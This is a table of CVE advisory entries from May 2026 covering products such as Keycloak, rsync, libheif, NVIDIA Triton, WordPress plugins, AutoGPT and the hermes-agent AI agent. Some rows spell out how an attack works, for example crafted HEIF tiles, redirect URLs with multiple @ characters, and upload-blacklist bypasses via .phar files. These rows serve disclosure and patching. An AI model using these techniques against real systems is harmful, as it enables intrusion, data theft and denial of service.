| nimiq--core-rs-albatross | nimiq-blockchain provides persistent block storage for Nimiq's Rust implementation. In versions 1.3.0 and below, a malicious network peer can crash any Nimiq full node by publishing a crafted Kademlia DHT record. The maliciously crafted record would contain a TaggedSigned<ValidatorRecord, KeyPair> with a signature field whose byte length is not exactly 64 in order to cause a crash. When the victim node's DHT verifier calls TaggedSigned::verify, execution reaches Ed25519Signature::from_bytes(sig).unwrap() in the TaggedPublicKey implementation for Ed25519PublicKey. The from_bytes call fails because ed25519_zebra::Signature::try_from rejects slices not 64 bytes, and the unwrap() panics. The BLS TaggedPublicKey implementation correctly returns false on error; only the Ed25519 implementation panics. This issue has been fixed in version 1.4.0. | 2026-05-20 | 7.5 | CVE-2026-40092 |
| NousResearch--hermes-agent | A vulnerability was identified in NousResearch hermes-agent up to 2026.4.16. This affects the function check_all_command_guards of the file tools/approval.py of the component Batch Runner. Such manipulation leads to missing authorization. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9350 |
| NousResearch--hermes-agent | A security vulnerability has been detected in NousResearch hermes-agent up to 2026.4.23. Impacted is an unknown function of the file agent/skills_guard.py of the component Skills Guard Multi-Word Prompt Handler. The manipulation of the argument THREAT_PATTERNS leads to injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9353 |
| NousResearch--hermes-agent | A vulnerability was found in NousResearch hermes-agent 2026.4.23. The impacted element is the function _scan_context_content of the file agent/prompt_builder.py. The manipulation results in injection. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9366 |
| NousResearch--hermes-agent | A vulnerability was determined in NousResearch hermes-agent up to 5157f5427f19488b31c6fdebbacd15d798ce7f63. This affects the function detect_dangerous_command of the file tools/approval.py of the component terminal_tool. This manipulation causes os command injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9367 |
| NousResearch--hermes-agent | A vulnerability was identified in NousResearch hermes-agent up to 2026.4.16. This impacts the function execute_code of the file tools/code_execution_tool.py of the component Environment Variable Handler. Such manipulation leads to a sandbox issue. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9368 |
| nukeviet--nukeviet | NukeViet CMS is a multi Content Management System. Versions 4.5.07 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability caused by insufficient server-side input sanitization in the Request class. The application relies primarily on client-side filtering to sanitize HTML tags and attributes in user-submitted content, which can be bypassed by intercepting and modifying HTTP requests directly (e.g., using Burp Suite). An attacker can inject malicious payloads which are stored server-side and executed in the browser of any user who views the content. Anyone viewing user-submitted content (such as administrators and moderators reviewing contact messages or comments) is impacted, and the vulnerability can be exploited by any anonymous visitor without authentication, with the Contact module used only as a proof of concept. Potential consequences include session hijacking through cookie theft, unauthorized actions performed under the victim's identity, defacement or redirection to phishing pages, and phishing attacks via manipulated email notifications. This issue has been fixed in version 4.5.08. If developers are unable to upgrade immediately, they should work around this issue by implementing server-side HTML sanitization in the Request class to strip or encode dangerous tags and attributes (e.g., <iframe>, srcdoc, event handlers like onerror/onload), enforcing a Content Security Policy (CSP) to restrict inline script execution, and setting cookies with the HttpOnly flag to mitigate cookie theft via XSS. | 2026-05-22 | 8.7 | CVE-2026-41147 |
| NVIDIA--BioNeMo Framework | NVIDIA BioNeMo Core for Linux contains a vulnerability where a user could cause a path traversal by loading a malicious file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering. | 2026-05-20 | 8.8 | CVE-2026-24217 |
| NVIDIA--BioNeMo Framework | NVIDIA BioNemo for Linux contains a vulnerability where a user could cause a deserialization of untrusted data. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering. | 2026-05-20 | 7.8 | CVE-2026-24216 |
| NVIDIA--DGX Spark | NVIDIA DGX OS contains a vulnerability in the factory provisioning process, where the cloning of a base image causes identical SSH host keys to be deployed across multiple systems. The sharing of cryptographic identifiers across all similarly provisioned systems enables host impersonation or attacker-in-the-middle attacks. A successful exploit of this vulnerability might lead to code execution, data tampering, escalation of privileges, information disclosure, and denial of service. | 2026-05-20 | 8.1 | CVE-2026-24218 |
| NVIDIA--TensorRT | NVIDIA TensorRT contains a vulnerability where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to data tampering. | 2026-05-20 | 8.2 | CVE-2026-24188 |
| NVIDIA--TensorRT-LLM | NVIDIA TRT-LLM for any platform contains a vulnerability in MPI server, where an attacker could cause an unsafe deserialization. A successful exploit of this vulnerability might lead to code execution, denial of service, data tampering, and information disclosure. | 2026-05-20 | 7.5 | CVE-2025-33255 |
| NVIDIA--TensorRT-LLM | NVIDIA TRT-LLM for any platform contains a vulnerability in RPC testing, where an attacker could cause an unsafe deserialization. A successful exploit of this vulnerability might lead to code execution, denial of service, data tampering, and information disclosure. | 2026-05-20 | 7.5 | CVE-2026-24163 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause an authentication bypass. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, or information disclosure. | 2026-05-20 | 9.8 | CVE-2026-24207 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability in the DALI backend where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, or information disclosure. | 2026-05-20 | 8 | CVE-2026-24213 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability in the DALI backend where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to code execution, data tampering, or denial of service. | 2026-05-20 | 8 | CVE-2026-24214 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause an authentication bypass. A successful exploit of this vulnerability might lead to escalation of privileges, denial of service, or information disclosure. | 2026-05-20 | 7.3 | CVE-2026-24206 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause a path traversal issue. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 7.5 | CVE-2026-24209 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 7.5 | CVE-2026-24210 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in incs/remotes.inc.php where latitude, longitude, callsign, mph, altitude, and timestamp values parsed from external GPS tracking service XML/JSON responses (InstaMapper and Google Latitude integration) are concatenated into UPDATE and INSERT statements without sanitization. An attacker able to compromise or impersonate the remote GPS tracker endpoint can inject SQL to manipulate the responder location, tracks, and assignment tables. | 2026-05-21 | 8.2 | CVE-2026-48235 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains hardcoded MySQL database credentials in loader.php (a public-facing database utility) that are committed to the source repository. Any actor with access to the public source tree (or an unauthenticated attacker with read access to the file on a deployed installation) can read the username, password, and database name and use them to connect to the database if it is reachable from their network. | 2026-05-21 | 8.1 | CVE-2026-48241 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains hardcoded MySQL database connection credentials (host, username, password, database name) in import_mdb.php. The credentials are embedded in source code committed to the public repository, allowing any reader of the source to obtain valid configuration values that may match deployed installations. | 2026-05-21 | 8.1 | CVE-2026-48242 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in tables.php where multiple POST parameters (tablename, indexname, sortby) are concatenated into table/column identifiers in dynamically constructed SELECT/UPDATE/DELETE statements without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48231 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/fullsit_incidents.php where the offset GET parameter is concatenated into the LIMIT clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48232 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/sit_incidents.php where the offset GET parameter is concatenated into the LIMIT clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48233 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in portal/ajax/list_requests.php where the sort and dir GET parameters are concatenated into the ORDER BY clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48234 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in db_loader.php where multiple POST parameters (ticketsdb, ticketshost, ticketsuser, ticketspassword) are concatenated into mysqli connection arguments and dynamic SQL operating against an attacker-controlled database without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48236 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in message.php where the frm_ticket_id and frm_resp_id POST parameters are concatenated into WHERE clauses of SELECT/UPDATE statements without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48237 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/mobile_main.php where the id GET parameter is concatenated into the WHERE clause of a SELECT statement used as a ticket-existence sanity check without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48238 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/reports.php where the tick_id POST parameter is concatenated into the WHERE clause of SELECT statements in the incidents summary report without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48239 |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/statistics.php where the tick_id and f_tick_id POST parameters are concatenated into WHERE clauses of SELECT statements in the statistics rollup queries without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48240 |
| OpenHarmony--OpenHarmony | OpenHarmony v6.0 and prior versions allow a remote attacker to achieve arbitrary code execution in pre-installed apps. | 2026-05-19 | 8.1 | CVE-2026-24792 |
| OpenHarmony--OpenHarmony | OpenHarmony v6.0 and prior versions allow a local attacker to cause a DoS from which the device cannot recover. | 2026-05-19 | 8.4 | CVE-2026-25781 |
| OpenHarmony--OpenHarmony | OpenHarmony v6.0 and prior versions allow a remote attacker to achieve arbitrary code execution in pre-installed apps. | 2026-05-19 | 8.8 | CVE-2026-27648 |
| OPPO--O+ Connect | A local privilege escalation vulnerability exists in O+ Connect because it fails to validate the identity of the caller on the pipe interface. | 2026-05-19 | 7.3 | CVE-2026-22069 |
| Piotnet--Piotnet Addons For Elementor Pro | The Piotnet Addons for Elementor Pro plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the 'pafe_ajax_form_builder' function in all versions up to, and including, 7.1.70. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability can only be exploited if a file field is added to the form. | 2026-05-19 | 9.8 | CVE-2026-4885 |
| Piotnet--Piotnet Forms | The Piotnet Forms plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the 'piotnetforms_ajax_form_builder' function in all versions up to, and including, 2.1.40. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability can only be exploited if a file field is added to the form. | 2026-05-19 | 9.8 | CVE-2026-4883 |
| PixelYourSite--Boost | The Boost plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.0.3 via deserialization of untrusted input in the STYXKEY-BOOST_USER_LOCATION cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions such as deleting arbitrary files, retrieving sensitive data, or executing code, depending on the POP chain present. | 2026-05-20 | 9.8 | CVE-2026-7637 |
| PixelYourSite--Boost | The Boost plugin for WordPress is vulnerable to time-based SQL Injection via the 'current_url' and 'user_name' parameters in versions up to, and including, 2.0.3 due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL queries. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-20 | 7.5 | CVE-2026-9010 |
| pixelyoursite--Cost of Goods by PixelYourSite | The Cost of Goods by PixelYourSite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'csvdata[0][cost_of_goods_value]' parameter in versions up to, and including, 1.2.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-20 | 7.2 | CVE-2026-7613 |
| PosCube Hardware Software and Consulting Ltd.--QR Menu | Authorization bypass through User-Controlled key vulnerability in PosCube Hardware Software and Consulting Ltd. QR Menu allows Exploitation of Trusted Identifiers. This issue affects QR Menu: through 21052026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-21 | 7.5 | CVE-2025-13479 |
| PowerDNS--Authoritative | Insufficient Validation of Autoprimary SOA Queries | 2026-05-21 | 7.5 | CVE-2026-42001 |
| projectworlds--hospital-management-system-in-php | A flaw has been found in projectworlds hospital-management-system-in-php 1.0. Affected by this vulnerability is the function getAllPatientDetail of the file update_info.php of the component GET Parameter Handler. Manipulating the argument appointment_no can lead to SQL injection. The attack may be performed remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-18 | 7.3 | CVE-2026-8785 |
| projectworlds--Online Art Gallery Shop | A flaw has been found in projectworlds Online Art Gallery Shop 1.0. Impacted is an unknown function of the file /admin/adminHome.php. Manipulating the argument social_linked can lead to SQL injection. The attack can be executed remotely. The exploit has been published and may be used. | 2026-05-24 | 7.3 | CVE-2026-9364 |
| prosolution--ProSolution WP Client | The ProSolution WP Client plugin for WordPress is vulnerable to Arbitrary File Upload in versions up to, and including, 2.0.0. This is due to an array validation mismatch where only the first file in the upload array undergoes extension and MIME type validation, while all files are processed and uploaded to a web-accessible directory. This makes it possible for unauthenticated attackers to upload malicious PHP files and achieve remote code execution by sending a valid first file followed by a malicious file. | 2026-05-20 | 9.8 | CVE-2026-6555 |
| Red Hat--Red Hat build of Keycloak 26.2 | A flaw was found in Keycloak's URL validation logic during redirect operations. By crafting a malicious request, an attacker could bypass validation to redirect users to unauthorized URLs, potentially leading to the exposure of sensitive information within the domain or facilitating further attacks. This vulnerability specifically affects Keycloak clients configured with a wildcard (*) in the "Valid Redirect URIs" field and requires user interaction to be successfully exploited. The issue stems from a discrepancy in how Keycloak and the underlying Java URI implementation handle the user-info component of a URL. If a malicious redirect URL is constructed using multiple @ characters in the user-info section, Java's URI parser fails to extract the user-info, leaving only the raw authority field. Consequently, Keycloak's validation check fails to detect the malformed user-info, falls back to a wildcard comparison, and incorrectly permits the malicious redirect. | 2026-05-19 | 8.1 | CVE-2026-7504 |
| Red Hat--Red Hat build of Keycloak 26.2 | A flaw was found in Keycloak. A remote, unauthenticated attacker can send a specially crafted XML input to the Security Assertion Markup Language (SAML) endpoint. This malicious input can cause high CPU usage and worker thread starvation, leading to a Denial of Service (DoS) where the server becomes unavailable. | 2026-05-19 | 7.5 | CVE-2026-7307 |
| Red Hat--Red Hat build of Keycloak 26.2 | A session fixation vulnerability was found in Keycloak's login-actions endpoints. An unauthenticated attacker could exploit this flaw by pre-creating an authentication session and tricking a victim into visiting a maliciously crafted link. By leveraging the /login-actions/restart endpoint, which processes session handles without adequate CSRF protection or cookie ownership validation, an attacker can reset the authentication flow state. This causes Single Sign-On (SSO) to authenticate the victim transparently upon clicking the link, allowing the attacker to hijack the required-action form without needing the victim's credentials. A successful exploit could lead to complete account takeover, including highly privileged administrative accounts. | 2026-05-19 | 7.5 | CVE-2026-7507 |
| Red Hat--Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. A low-privilege user, with knowledge of user credentials and client ID, can bypass a security control intended to disable the implicit flow in OpenID Connect (OIDC) clients. By manipulating client data during a session restart, an attacker can obtain an access token that should not be available. This vulnerability can also lead to the exposure of these access tokens in server logs, proxy logs, and HTTP Referrer headers, resulting in sensitive information disclosure. | 2026-05-19 | 7.1 | CVE-2026-7571 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389-ds-base. The get_ldapmessage_controls_ext() function in the LDAP server does not enforce an upper bound on the number of controls per LDAP message. A remote, unauthenticated attacker can send a specially crafted LDAP request containing hundreds of thousands of minimal controls within the default maximum BER message size (2 MB), causing excessive CPU consumption and heap allocation on the server. Under concurrent exploitation, this leads to significant latency degradation, worker thread starvation, or out-of-memory termination, resulting in a denial of service. | 2026-05-20 | 7.5 | CVE-2026-9064 |
| Red Hat--Red Hat Hardened Images | A flaw was found in gnutls. A remote attacker could exploit an issue in the Datagram Transport Layer Security (DTLS) packet reordering logic. The comparator function, responsible for ordering DTLS packets by sequence numbers, did not correctly handle packets with duplicate sequence numbers. This could lead to unstable packet ordering or undefined behavior, resulting in a denial of service. | 2026-05-18 | 7.5 | CVE-2026-42009 |
| Redaxo--Redaxo CMS Mediapool | Redaxo CMS Mediapool Addon 5.5.1 and older contains an arbitrary file upload vulnerability that allows authenticated users to bypass file extension blacklist restrictions. Attackers with editor accounts can upload executable files by using obfuscated extensions like php71 or php53 to evade the blacklist filter and execute arbitrary code. | 2026-05-23 | 8.8 | CVE-2018-25353 |
| Repute Infosystems--BookingPress Appointment Booking Pro | The BookingPress Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'bookingpress_validate_submitted_booking_form_func' function in all versions up to, and including, 5.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability can only be exploited if a signature custom field is added to the booking form. | 2026-05-21 | 9.8 | CVE-2026-6960 |
| RsyncProject--rsync | Rsync versions 3.4.2 and prior contain an integer overflow vulnerability in the compressed-token decoder where a 32-bit signed counter is not checked for overflow, allowing a malicious sender to trigger an overflow that causes the receiver process to read and return data from outside the intended buffer bounds. Attackers can exploit this vulnerability to disclose process memory contents including environment variables, passwords, heap and stack data, and library memory pointers, significantly reducing ASLR effectiveness and facilitating further exploitation. | 2026-05-20 | 8.1 | CVE-2026-43618 |
| RsyncProject--rsync | Rsync versions before 3.4.3 contain a time-of-check to time-of-use (TOCTOU) race condition in daemon file handling that allows attackers to redirect file writes outside intended directories by replacing parent directory components with symbolic links. Attackers with write access to a module path can exploit this race condition to create or overwrite arbitrary files, potentially modifying sensitive system files and achieving privilege escalation when the daemon runs with elevated privileges. This vulnerability can only be triggered if the chroot setting is false. | 2026-05-20 | 7 | CVE-2026-29518 |
| ruby-lang--Ruby | An issue was discovered in Ruby 4 before 4.0.5. A race condition leading to a use-after-free in the pthread-based getaddrinfo timeout handler (rb_getaddrinfo in ext/socket/raddrinfo.c) allows a remote attacker who can delay DNS responses near the user-specified timeout to crash a Ruby process that calls Addrinfo.getaddrinfo(..., timeout:) or Socket.tcp(..., resolv_timeout:). Memory-corruption-based exploitation is theoretically possible. The attack could, for example, be carried out through a crafted authoritative DNS server or recursive resolver. | 2026-05-22 | 8.1 | CVE-2026-46727 |
| Samsung Open Source--Escargot | Use after free vulnerability in Samsung Open Source Escargot allows Pointer Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 7.8 | CVE-2026-47310 |
| Samsung Open Source--Escargot | Heap-based buffer overflow vulnerability in Samsung Open Source Escargot allows Overflow Buffers. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 7.8 | CVE-2026-47311 |
| Samsung Open Source--Escargot | Out-of-bounds write vulnerability in Samsung Open Source Escargot allows Overflow Buffers. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 7.8 | CVE-2026-47314 |
| SigmaPlugin--Advanced Database Cleaner Premium | The Advanced Database Cleaner - Premium plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.1.0 via the 'template' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included. | 2026-05-20 | 8.8 | CVE-2026-7522 |
| Significant-Gravitas--AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Versions 0.6.36 through 0.6.50 are vulnerable to Authenticated Session Hijacking via IDOR. If an authenticated attacker can determine the session_id of another user's session, they can take it over, reading any messages in it and locking the legitimate user out. The PATCH /sessions/{session_id}/assign-user endpoint authenticates the caller but never verifies session ownership: the service layer invokes the session lookup with user_id=None, which the data access layer interprets as a privileged/system call that bypasses the ownership filter, allowing any authenticated user to reassign an arbitrary session to themselves. This issue has been patched in version 0.6.51. | 2026-05-18 | 7.1 | CVE-2026-30950 |
| Significant-Gravitas--AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Versions 0.4.2 through 0.6.51 are vulnerable to an unauthenticated Denial of Service (DoS) through the server due to uncontrolled disk space consumption. The download_agent_file endpoint creates persistent temporary files for every request but fails to delete them after they are served. An unauthenticated attacker can repeatedly call this endpoint to exhaust the server's disk space, causing the database or other system services to fail due to "No space left on device" errors, rendering the entire AutoGPT Platform backend unavailable to all users. This issue has been patched in version 0.6.52. | 2026-05-19 | 7.5 | CVE-2026-33232 |
| Significant-Gravitas--AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. In versions 0.6.34 through 0.6.51, the backend deserializes Redis cache bytes using pickle.loads without integrity/authenticity checks. The write path serializes values with pickle.dumps(...) into Redis and the read path blindly invokes pickle.loads(...) on bytes with no HMAC/signature or strict schema validation gating deserialization. If an attacker can poison a shared-cache key in Redis, arbitrary command execution is possible in the backend container context, affecting confidentiality, integrity, and availability. This issue has been fixed in version 0.6.52. | 2026-05-19 | 7.6 | CVE-2026-33233 |
| Sipp--SIPp | SIPp 3.6 and earlier contains a local buffer overflow vulnerability in command-line argument handling that allows local attackers to crash the application or execute arbitrary code. Attackers can trigger the vulnerability by supplying oversized input to the -3pcc, -i, or -log_file parameters, causing strcpy to write beyond buffer boundaries in sipp.cpp. | 2026-05-23 | 8.4 | CVE-2018-25356 |
| Sitemio Information Technologies Trade Ltd. Co.--WISECP | Cross-Site request forgery (CSRF) vulnerability in Sitemio Information Technologies Trade Ltd. Co. WISECP allows Cross Site Request Forgery. This issue affects WISECP: through 20022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-20 | 8 | CVE-2025-11954 |
| SourceCodester--Hospitals Patient Records Management System | A flaw has been found in SourceCodester Hospitals Patient Records Management System 1.0. The impacted element is an unknown function of the file /classes/Master.php?f=save_patient_history. Manipulation of the argument ID causes SQL injection. The attack can be carried out remotely. The exploit has been published and may be used. | 2026-05-24 | 7.3 | CVE-2026-9355 |
| SourceCodester--Hospitals Patient Records Management System | A vulnerability has been found in SourceCodester Hospitals Patient Records Management System 1.0. This affects an unknown function of the file /admin/patients/manage_history.php. Manipulation of the argument ID leads to SQL injection. The attack may be performed remotely. The exploit has been disclosed to the public and may be used. | 2026-05-24 | 7.3 | CVE-2026-9356 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.2 and 10.0.5, and Splunk Cloud Platform versions below 10.3.2512.8, 10.2.2510.11, 10.1.2507.21, and 10.0.2503.13, a user with a role that has access to the `_internal` index could view session cookies and response bodies that contain sensitive data. | 2026-05-20 | 7.5 | CVE-2026-20239 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.2, 10.0.5, 9.4.11, and 9.3.12, and Splunk Cloud Platform versions below 10.4.2603.1, 10.3.2512.9, 10.2.2510.11, 10.1.2507.21, 10.0.2503.13, and 9.3.2411.129, a low-privileged user that does not hold the 'admin' or 'power' Splunk roles could cause a Denial of Service by exploiting the `coldToFrozen.sh` script in the `splunk_archiver` app to rename critical Splunk directories, making the instance non-functional. The Denial of Service is possible because of missing input validation in the `coldToFrozen.sh` script, which accepts arbitrary file paths and renames them without restricting operations to safe directories. | 2026-05-20 | 7.1 | CVE-2026-20240 |
| steipete--summarize | Summarize prior to 0.15.1 contains a path traversal vulnerability in the /v1/summarize daemon endpoint that allows authenticated callers to write files to arbitrary directories by supplying an absolute path or directory traversal sequence in the slidesDir request parameter. Attackers can exploit this to write slide_*.png and slides.json files to any writable directory and subsequently delete matching files at the specified location through repeat extraction. | 2026-05-18 | 7.1 | CVE-2026-45242 |
| steipete--summarize | Summarize prior to 0.15.1 contains a vulnerability in the hover summary feature that allows malicious pages to dispatch synthetic mouseover events over attacker-controlled links, causing the extension to make authenticated daemon requests using stored tokens without verifying event trustworthiness. Attackers can place local or private-network URLs behind hoverable links to route authenticated requests through the daemon, potentially accessing sensitive internal endpoints when users interact with attacker-controlled content. | 2026-05-18 | 7.4 | CVE-2026-45245 |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. Versions 1.21.2 and prior contain a heap-buffer-overflow (write) vulnerability in the grid tile compositing, allowing an attacker to write 64 bytes of fully attacker-controlled data past the end of a chroma plane heap allocation by crafting a HEIF/AVIF file with a 1×4 grid of odd-height tiles. The overflow is triggered during normal image decoding with default build configuration. The written bytes are chroma (Cb/Cr) pixel values from the attacking tile, giving the attacker full control over the overflow content. This issue has been fixed in version 1.22.0. | 2026-05-19 | 8.8 | CVE-2026-32740 |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. Versions 1.21.2 and below contain a heap buffer overflow in MaskImageCodec::decode_mask_image(). When decoding a HEIF file containing a mask image (mski), the function copies the full iloc extent data into a pixel buffer using memcpy(dst, data.data(), data.size()). The copy length data.size() is determined by the iloc extent in the file (attacker-controlled), while the destination buffer is sized based on the declared image dimensions. Because no upper-bound check exists on the data length, a crafted file whose iloc extent exceeds the pixel buffer allocation overflows the heap. The vulnerable single-memcpy branch is reached when the mskC property specifies bits_per_pixel = 8 and the ispe property declares an even width ≥ 64 (so that stride == width), with no changes to default security limits or external codec plugins required. This issue has been fixed in version 1.22.0. | 2026-05-19 | 7.1 | CVE-2026-32741 |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. Versions 1.21.2 and prior contain a heap buffer over-read in HeifPixelImage::overlay() in libheif/pixelimage.cc. When compositing an overlay image (iovl) whose child image has a different bit depth for the alpha channel than for the color channels, the function indexes into the alpha plane using the color channel stride (in_stride) instead of the previously retrieved alpha_stride, causing reads past the end of the alpha buffer (up to 3,123 bytes for a 100×50 image with 10-bit color and 8-bit alpha). A crafted HEIF file can exploit this to cause a denial of service (crash) or potentially disclose adjacent heap memory through leaked bytes embedded in the decoded output pixels. This issue has been fixed in version 1.22.0. | 2026-05-19 | 7.1 | CVE-2026-32882 |
| SUSE--Container suse/sle-micro-rancher/5.3:latest | In `src/havegecmd.c`, the `socket_handler` function performs a credential check on the abstract UNIX socket (`\0/sys/entropy/haveged`). However, while it detects if the connecting user is not root (`cred.uid != 0`) and prepares a negative acknowledgement (`ASCII_NAK`), it **fails to stop execution**. The code proceeds to the `switch` statement, allowing any local unprivileged user to execute privileged commands such as `MAGIC_CHROOT`. | 2026-05-20 | 7.8 | CVE-2026-41054 |
| SUSE--SUSE Linux Enterprise | `PluginScript` attempts to `chroot` the plugin to the `repoManagerRoot`; this root is frequently `/` (the system root) in standard configurations or when using `--root`. If the chroot target is `/`, it is a no-op, allowing the traversed path to execute host binaries (like `/bin/bash`) with root privileges. | 2026-05-20 | 7.8 | CVE-2026-44933 |
| syslink software AG--Avantra | Insufficient session expiration vulnerability in syslink software AG Avantra on Linux, Windows allows Reusing Session IDs (aka Session Replay). This issue affects Avantra: before 25.3.1. | 2026-05-22 | 9.6 | CVE-2026-8670 |
| syslink software AG--Avantra | Insertion of sensitive information into log file vulnerability in syslink software AG Avantra on Linux, Windows allows Resource Leak Exposure. This issue affects Avantra: before 25.3.0. | 2026-05-22 | 7.5 | CVE-2026-8671 |
| Taiko Network Communications Pte Ltd.--AG1000-01A SMS Alert Gateway | Taiko AG1000-01A SMS Alert Gateway Rev 7.3 and Rev 8 contains a hard-coded credential vulnerability in the embedded web configuration interface where authentication is implemented entirely in client-side JavaScript in login.zhtml, exposing static plaintext credentials in the page source. Unauthenticated attackers with network access can recover administrative credentials directly from the client-side validate() function to obtain full administrative access to the device. | 2026-05-20 | 9.8 | CVE-2026-9139 |
